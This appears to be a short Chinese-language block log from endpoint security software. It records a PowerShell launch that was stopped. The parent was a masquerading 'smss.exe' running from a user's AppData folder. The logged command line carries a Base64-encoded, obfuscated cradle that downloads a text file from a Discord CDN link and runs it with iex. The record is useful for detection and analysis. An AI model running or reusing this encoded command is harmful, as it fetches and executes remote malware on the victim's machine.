防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB2ADEAPQAiAE4AZQB0AC4AIgA7ACQAdgAyAD0AIgBXAGUAYgBDAGwAaQBlAG4AdAAiADsAaQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHYAMQAkAHYAMgApAC4AIgBEAG8AdwBuAGAAbABgAG8AYQBkAFMAdAByAGkAbgBnACIAKAAiAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADgAOAAwADIANgA1ADcAOQA2ADcANgA3ADYAMAA4ADgAOQAyAC8AOAA4ADYANAAwADEAMAAxADgAMwAxADEANgAyADYANwA4ADIALwBOAGUAdwBfAFQAZQB4AHQAXwBEAG8AYwB1AG0AZQBuAHQALgB0AHgAdAAiACkA
操作结果:已阻止
进程ID:11668
操作进程:C:\Users\Zhang\AppData\Local\smss.exe
操作进程命令行:"C:\Users\Zhang\AppData\Local\smss.exe"
父进程ID:7432
父进程:C:\Windows\Explorer.EXE
父进程命令行:C:\Windows\Explorer.EXE
|
收藏